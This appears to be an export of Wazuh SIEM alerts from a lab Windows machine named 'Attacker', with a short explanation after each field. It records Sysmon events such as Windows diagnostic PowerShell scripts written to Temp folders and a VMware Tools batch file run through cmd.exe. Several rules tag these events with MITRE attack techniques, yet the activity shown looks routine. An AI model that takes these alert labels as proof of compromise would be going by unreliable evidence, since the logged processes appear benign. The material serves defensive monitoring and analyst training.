data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\TS_DiagnosticHistory.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-17 16:47:59.170 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Scripting file created under Windows Temp or User folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92200 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059', 'T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution', 'Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.553658 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:47:59.1906537Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 215909 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:47:59.181
ProcessGuid: {94294ddc-4855-6800-0605-000000000e00}
ProcessId: 8224
Image: C:\WINDOWS\system32\taskhostw.exe
TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\TS_InaccurateSystemTime.ps1
CreationUtcTime: 2025-04-17 16:47:59.181
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:47:59.181 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-4855-6800-0605-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\taskhostw.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\TS_InaccurateSystemTime.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-17 16:47:59.181 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Scripting file created under Windows Temp or User folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92200 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059', 'T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution', 'Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.556345 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:47:59.2078912Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 215910 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:47:59.190
ProcessGuid: {94294ddc-4855-6800-0605-000000000e00}
ProcessId: 8224
Image: C:\WINDOWS\system32\taskhostw.exe
TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\TS_WERQueue.ps1
CreationUtcTime: 2025-04-17 16:47:59.190
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:47:59.190 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-4855-6800-0605-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\taskhostw.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\TS_WERQueue.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-17 16:47:59.190 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.558984 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:48:00.6014475Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 215966 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:48:00.599
ProcessGuid: {94294ddc-30bf-6801-4608-000000000e00}
ProcessId: 6980
Image: C:\WINDOWS\System32\sdiagnhost.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_db30s5jz.dk2.ps1
CreationUtcTime: 2025-04-17 16:48:00.599
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:48:00.599 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-30bf-6801-4608-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 6980 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\sdiagnhost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_db30s5jz.dk2.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-17 16:48:00.599 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.id: 11 Numeric ID of the detection rule that fired.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['stats'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533991.561646 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: The average number of logs between 22:00 and 23:00 is 2213. We reached 5534. The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 13 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 13 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:52:26.7422645Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 216633 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Registry value set:
RuleName: -
EventType: SetValue
UtcTime: 2025-04-17 16:52:26.740
ProcessGuid: {94294ddc-ea80-67fe-0d00-000000000e00}
ProcessId: 908
Image: C:\WINDOWS\system32\svchost.exe
TargetObject: HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\8348\Reason
Details: DWORD (0x00000004)
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.eventType: SetValue No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:52:26.740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-ea80-67fe-0d00-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 908 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetObject: HKLM\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\TermReason\\8348\\Reason No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.details: DWORD (0x00000004) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Windows command prompt started by an abnormal process Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92052 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Command Shell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534015.563163 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:35.4122124Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 218350 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-20 01:40:34.927
ProcessGuid: {94294ddc-5092-6804-8308-000000000e00}
ProcessId: 13156
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.26100.3624 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""
CurrentDirectory: C:\WINDOWS\system32\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04
ParentProcessGuid: {94294ddc-ea88-67fe-4800-000000000e00}
ParentProcessId: 3220
ParentImage: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
ParentCommandLine: "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:40:34.927 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-5092-6804-8308-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13156 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\cmd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3624 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows Command Processor No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: Cmd.Exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\WINDOWS\\system32\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4800-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3220 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Suspicious Windows cmd shell execution Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92032 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087', 'T1059.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery', 'Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery', 'Windows Command Shell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534015.568786 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:35.6081940Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 218360 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-20 01:40:35.504
ProcessGuid: {94294ddc-5093-6804-8508-000000000e00}
ProcessId: 2096
Image: C:\Windows\System32\conhost.exe
FileVersion: 10.0.26100.3624 (WinBuild.160101.0800)
Description: Console Window Host
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: CONHOST.EXE
CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
CurrentDirectory: C:\WINDOWS
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D
ParentProcessGuid: {94294ddc-5092-6804-8308-000000000e00}
ParentProcessId: 13156
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:40:35.504 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-5093-6804-8508-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2096 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\conhost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3624 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Console Window Host No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: CONHOST.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\WINDOWS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-5092-6804-8308-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13156 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\cmd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
